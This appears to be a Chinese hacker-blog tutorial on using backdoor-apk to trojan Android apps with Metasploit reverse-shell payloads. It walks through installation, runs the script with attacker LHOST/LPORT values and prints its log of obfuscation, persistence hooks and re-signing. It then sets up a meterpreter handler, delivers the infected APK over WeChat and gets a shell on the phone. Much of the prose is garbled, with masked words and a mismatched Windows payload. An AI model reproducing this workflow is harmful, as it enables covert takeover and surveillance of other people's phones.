backdoor

hacker4年前黑客文章936

backdoor-apk是一个shell脚本 *** ,它简单化了向一切Android APK文档加上木马程序的全过程。此shell脚本 *** 的客户应具备Linux,Bash,Metasploit,Apktool,Android SDK, *** ali等的工作中专业知识。此shell脚本 *** 按原状出示,不出示一切方式的贷款担保,仅用以文化教育目地。

 

通俗化的讲:backdoor-apk 从姓名上大家就能了解它的主要用途了,没有错便是用于制做 APK 侧门的。这款专用工具应用起來十分便捷,并且作用也很强劲!话不多说,下边大家直接进入主题。

 

特别提示:原文中谈及的一部分技术性仅作安全学习和课堂教学主要用途,严禁不法应用!

 

1、更先,使我们对它开展安裝,在安裝前大家必须先安裝它的一些依靠 lib 库文件:

apt-get install lib32stdc  6 lib32ncurses5 lib32z1

安裝依靠 lib 库文件

 

2、这儿了解大家,对这种安裝的服务项目,当她们升级时已不开展了解。大家挑选 Yes 就可以!

yes

 

在进行之上依靠库的安裝后然后大家就可以安裝 backdoor-apk 啦!

 

backdoor-apk 免费下载、安裝、使用 ***

 

1、免费下载backdoor-apk

我是立即用的git下载backdoor-apk,其他 *** 还可以,比如:wget;

git clone https://github.com/dana-at-cp/backdoor-apk.git

 

2、免费下载进行后大家进到到其文件名称下:

cd backdoor-apk/

cd backdoor-apk

 

3、在当前目录下,我们可以见到一个脚本文件。

需注意:大家必须准备充分一个用于关联侧门的apk文件。

./backdoor-apk.sh /root/secist.apk
挑选 3 payload
LHOST:192.168.15.131
LPORT:4444

backdoor-apk 服务器和端口号

 

4、Android明细管理权限选择项:

[ ] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1

 

怎么知道侧门APK是不是转化成 取得成功?

下列操作流程就算是取得成功!

[email protected]:~/Code/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh BaiduBrowser.apk 
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.3 on Mon Oct  9 16:50:06 EDT 2017
[ ] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[ ] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[ ] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling original APK file...done.
[ ] Keeping permissions of original project
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT  *** ali files...done.
[*] Copying RAT  *** ali files to new directories in original project...done.
[*] Fixing RAT  *** ali files...done.
[*] Obfuscating const-string values in RAT  *** ali files...done.
[*] Locating  *** ali file to hook in original project...done.
[*] Adding hook in original  *** ali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
[email protected]:~/Code/github/backdoor-apk/backdoor-apk#

 

5、取得成功实行之上实际操作后,会转化成一个关联侧门的 secist.apk 文档,默认设置被储存在 backdoor-apk>>original>>dist 文件目录下!下边大家来起动监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.131
set lport 4444
exploit

backdoor-apk>>original>>dist 文件目录

 

6、另外,我将转化成的含有侧门的 APK 发送到我的微信,并开展安裝开启!backdoor-apk

backdoor-apk

 

7、迅速我们可以见到,我已经获得了手机上的 meterpreter shell !meterpreter shell

 

简易键入一个,查询系统信息的指令:

sysinfo

能够见到总体目标系统软件为 安卓6 版本号,核心为 linux 3.10.49 构架为 armv7l 。sysinfo

标签: 黑客技术

相关文章

Keepassx是不是适用全部电脑操作系统?

Keepassx是不是适用全部电脑操作系统?

什么叫Keepassx? 针对安全性的本人数据库管理,KeepassX是一个十分高规定的客户的专用工具。KeePassX出示了一个用以建立安全性登陆密码的实用程序,密码生成器是高宽比可订制的,迅速的...

Maltego的典型性主要用途是啥?

Maltego的典型性主要用途是啥?

什么叫Maltego? Maltego由Paterva开发设计,是用以开源系统调查取证和智能化的专用工具。其重中之重是出示一个变换库,用以发觉来源于不一样开源系统的数据信息,并将该大数据可视化为适用...

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫openssh? OpenSSH是一个十分火爆的SSH网络信息安全专用工具,被数千万的互联网客户应用。一切n00b都能够对你说,像telnet,rlogin和ftp那样的协议书是不安全的。Op...

Medusa是不是适用全部电脑操作系统?

Medusa是不是适用全部电脑操作系统?

什么叫Medusa? Medusa为一个规模性平行面,模块化设计,迅速和登陆的野蛮人。目地是适用很多容许远程控制认证的服务项目。该专用工具的关键作用包含根据进程的并行处理检测 - 能够 对好几个服务...

OpenSSL是完全免费的吗?

OpenSSL是完全免费的吗?

什么叫OpenSSL? 这不是严格意义上来说是一个“黑客工具”,只是一个新项目(称之为“OpenSSL新项目”),致力于将详细的商业服务解决方法融合给网络信息安全专业人员出示安裝安全性套接字层(SS...

怎么教你怎么用黑客技术攻击网站  分享8个强大的黑客技术学习网站

怎么教你怎么用黑客技术攻击网站  分享8个强大的黑客技术学习网站

黑客攻击是一项很难掌握的技能,在很大的程度上要求人们对计算机和软件架构的各种概念和网络系统有深入的了解,今天,分享8个道德黑客学习可以利用的网站       黑客主要有两种:黑帽黑客、白帽...